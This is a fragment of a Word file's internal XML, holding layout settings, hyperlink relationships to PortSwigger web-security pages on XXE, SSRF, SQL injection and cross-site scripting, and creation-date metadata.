            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="1778599462">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1791780359">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1959873184">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="480"/>
          <w:marBottom w:val="480"/>
          <w:divBdr>
            <w:top w:val="single" w:sz="6" w:space="0" w:color="CBD0D1"/>
            <w:left w:val="single" w:sz="6" w:space="0" w:color="CBD0D1"/>
            <w:bottom w:val="single" w:sz="6" w:space="0" w:color="CBD0D1"/>
            <w:right w:val="single" w:sz="6" w:space="0" w:color="CBD0D1"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="389571774">
              <w:marLeft w:val="150"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="150"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="1289387131">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="480"/>
          <w:marBottom w:val="480"/>
          <w:divBdr>
            <w:top w:val="single" w:sz="6" w:space="0" w:color="CBD0D1"/>
            <w:left w:val="single" w:sz="6" w:space="0" w:color="CBD0D1"/>
            <w:bottom w:val="single" w:sz="6" w:space="0" w:color="CBD0D1"/>
            <w:right w:val="single" w:sz="6" w:space="0" w:color="CBD0D1"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="220334489">
              <w:marLeft w:val="150"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="150"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="1516503477">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="450"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="707687242">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="450"/>
          <w:marBottom w:val="480"/>
          <w:divBdr>
            <w:top w:val="single" w:sz="6" w:space="0" w:color="CBD0D1"/>
            <w:left w:val="single" w:sz="6" w:space="0" w:color="CBD0D1"/>
            <w:bottom w:val="single" w:sz="6" w:space="0" w:color="CBD0D1"/>
            <w:right w:val="single" w:sz="6" w:space="0" w:color="CBD0D1"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="204106233">
              <w:marLeft w:val="150"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="150"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="1386031049">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="480"/>
          <w:marBottom w:val="480"/>
          <w:divBdr>
            <w:top w:val="single" w:sz="6" w:space="0" w:color="CBD0D1"/>
            <w:left w:val="single" w:sz="6" w:space="0" w:color="CBD0D1"/>
            <w:bottom w:val="single" w:sz="6" w:space="0" w:color="CBD0D1"/>
            <w:right w:val="single" w:sz="6" w:space="0" w:color="CBD0D1"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="22815548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xxe/blind" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/web-security/xxe/blin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xxe" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/web-security/xxe" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/web-security/essential-skills/obfuscating-attacks-using-encodings" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/web-security/sql-injection" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/numbering" Target="numbering.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/web-security/ssrf" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/burp/vulnerability-scanner" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/web-security/xxe" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/web-security/cross-site-scripting" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/web-security/xxe/blin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swigger.net/blog/top-10-web-hacking-techniques-of-2018" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/burp/documentation/desktop/tools/collabo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2024-01-23T12:54:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-01-23T12:54:00Z</dcterms:modified>
</cp:coreProperties>
</file>